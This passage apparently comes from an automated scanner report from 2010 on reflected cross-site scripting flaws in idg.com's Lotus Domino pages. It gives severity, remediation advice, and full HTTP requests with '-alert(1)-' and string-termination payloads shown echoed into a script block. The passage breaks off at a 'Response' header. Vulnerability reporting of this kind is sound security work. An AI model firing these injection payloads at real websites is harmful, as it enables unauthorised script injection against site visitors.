Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf?c444a"-alert(1)-"ebcd302b3e9=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:15 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?c444a"-alert(1)-"ebcd302b3e9=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a290d"%3b812db769f64 was submitted in the REST URL parameter 1. This input was echoed as a290d";812db769f64 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwa290d"%3b812db769f64/homenew.nsf/06PageStyle.css HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:26 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwa290d";812db769f64/homenew.nsf/06PageStyle.css"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 380eb"%3bcca6040fbac was submitted in the REST URL parameter 3. This input was echoed as 380eb";cca6040fbac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/06PageStyle.css380eb"%3bcca6040fbac HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:27 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/06PageStyle.css380eb";cca6040fbac"); } catch(err) {}</script> ...[SNIP]...
2.178. http://idg.com/www/homenew.nsf/06PageStyle.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/06PageStyle.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5875"-alert(1)-"4e33749b853 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/06PageStyle.css?e5875"-alert(1)-"4e33749b853=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:26 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5032 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/06PageStyle.css?e5875"-alert(1)-"4e33749b853=1"); } catch(err) {}</script> ...[SNIP]...
The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f89bd"-alert(1)-"7fffc015d88 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/DataRequestor.js?OpenJavascriptLibraryf89bd"-alert(1)-"7fffc015d88 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:34 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5052 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js?OpenJavascriptLibraryf89bd"-alert(1)-"7fffc015d88"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9ed7"%3b4d8994ca061 was submitted in the REST URL parameter 1. This input was echoed as e9ed7";4d8994ca061 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwe9ed7"%3b4d8994ca061/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:34 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5042 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwe9ed7";4d8994ca061/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51509"%3bdad758df106 was submitted in the REST URL parameter 3. This input was echoed as 51509";dad758df106 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/DataRequestor.js51509"%3bdad758df106?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:35 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5042 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js51509";dad758df106?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
2.182. http://idg.com/www/homenew.nsf/DataRequestor.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/DataRequestor.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40b14"-alert(1)-"47ec7171e3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/DataRequestor.js?40b14"-alert(1)-"47ec7171e3d=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:35 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5033 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js?40b14"-alert(1)-"47ec7171e3d=1"); } catch(err) {}</script> ...[SNIP]...
The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39582"-alert(1)-"aaf4e6f2b15 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/JSLib.js?OpenJavascriptLibrary39582"-alert(1)-"aaf4e6f2b15 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:29 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5044 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js?OpenJavascriptLibrary39582"-alert(1)-"aaf4e6f2b15"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0cb"%3be2536f463e8 was submitted in the REST URL parameter 1. This input was echoed as 6d0cb";e2536f463e8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www6d0cb"%3be2536f463e8/homenew.nsf/JSLib.js?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:30 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5034 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www6d0cb";e2536f463e8/homenew.nsf/JSLib.js?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f944"%3bff3d0453a55 was submitted in the REST URL parameter 3. This input was echoed as 3f944";ff3d0453a55 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/JSLib.js3f944"%3bff3d0453a55?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:31 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5034 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js3f944";ff3d0453a55?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
2.186. http://idg.com/www/homenew.nsf/JSLib.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/JSLib.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a46a"-alert(1)-"27e933b060b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/JSLib.js?6a46a"-alert(1)-"27e933b060b=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:34 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5025 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js?6a46a"-alert(1)-"27e933b060b=1"); } catch(err) {}</script> ...[SNIP]...
The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d323a"-alert(1)-"85f83ae81d0 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/ajaxroutine.js?OpenJavascriptLibraryd323a"-alert(1)-"85f83ae81d0 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:30 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5050 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.js?OpenJavascriptLibraryd323a"-alert(1)-"85f83ae81d0"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45fad"%3b0d45e48607d was submitted in the REST URL parameter 1. This input was echoed as 45fad";0d45e48607d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www45fad"%3b0d45e48607d/homenew.nsf/ajaxroutine.js?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:30 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5040 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www45fad";0d45e48607d/homenew.nsf/ajaxroutine.js?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbe20"%3bcf8c8614847 was submitted in the REST URL parameter 3. This input was echoed as dbe20";cf8c8614847 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/ajaxroutine.jsdbe20"%3bcf8c8614847?OpenJavascriptLibrary HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:31 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5040 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.jsdbe20";cf8c8614847?OpenJavascriptLibrary"); } catch(err) {}</script> ...[SNIP]...
2.190. http://idg.com/www/homenew.nsf/ajaxroutine.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/ajaxroutine.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efb80"-alert(1)-"77dede8c335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/ajaxroutine.js?efb80"-alert(1)-"77dede8c335=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
